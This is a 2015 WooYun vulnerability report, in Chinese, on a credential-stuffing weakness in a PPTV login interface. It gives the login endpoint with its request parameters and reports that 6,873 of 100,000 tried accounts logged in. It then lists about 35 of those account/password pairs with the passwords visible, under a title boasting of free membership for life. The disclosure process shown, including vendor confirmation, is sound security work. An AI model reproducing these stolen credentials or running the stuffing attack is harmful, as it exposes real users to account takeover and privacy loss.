当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114768

漏洞标题:PPTV某接口撞库这辈子都不用充会员啦(获取数千账号)

相关厂商:PPTV(PPlive)

漏洞作者: 鸟云厂商

提交时间:2015-06-11 23:54

修复时间:2015-07-27 09:38

公开时间:2015-07-27 09:38

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

PPTV某接口撞库,这辈子都不用充会员啦

详细说明:

URL:http://passportstdby.pptv.com/v3/login/login.do
GET:format=jsonp&from=undefined&cb=jQuery183044330982165411115_1431927168727&username=******@qq%2ecom&password=******&CheckboxSaveInfo=on&_=1431927177720


跑了十万用户,出来6873个
贴一部分吧,毕竟太多了不好搞。

[email protected]	1988111
[email protected]	982545772
[email protected]	1985wang
[email protected]	3872549
[email protected]	1233214
[email protected]	dangqihua
[email protected]	31026265
[email protected]	741236
[email protected]	70568007
[email protected]	wolailiao
[email protected]	19891104
[email protected]	zhz0502
[email protected]	16897168
[email protected]	58336280
[email protected]	258123
[email protected]	511532
[email protected]	lin999
[email protected]	70737200
[email protected]	5515618
[email protected]	zwb930527
[email protected]	123456
[email protected]	woaini1
[email protected]	19871228
[email protected]	245222458
[email protected]	woaini
[email protected]	730926
[email protected]	19900421
[email protected]	123321
[email protected]	li3952288
[email protected]	asd369852147
[email protected]	7891230
[email protected]	aaaaaa
[email protected]	123456
[email protected]	8251481
[email protected]	dengqilong

漏洞证明:

屏幕快照 2015-05-18 下午1.35.37.png


屏幕快照 2015-05-18 下午1.37.23.png


屏幕快照 2015-05-18 下午1.37.47.png


屏幕快照 2015-05-18 下午1.38.07.png


屏幕快照 2015-05-18 下午1.38.27.png

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-12 09:36

厂商回复:

谢谢您的关注,接口正在修复中

最新状态:

暂无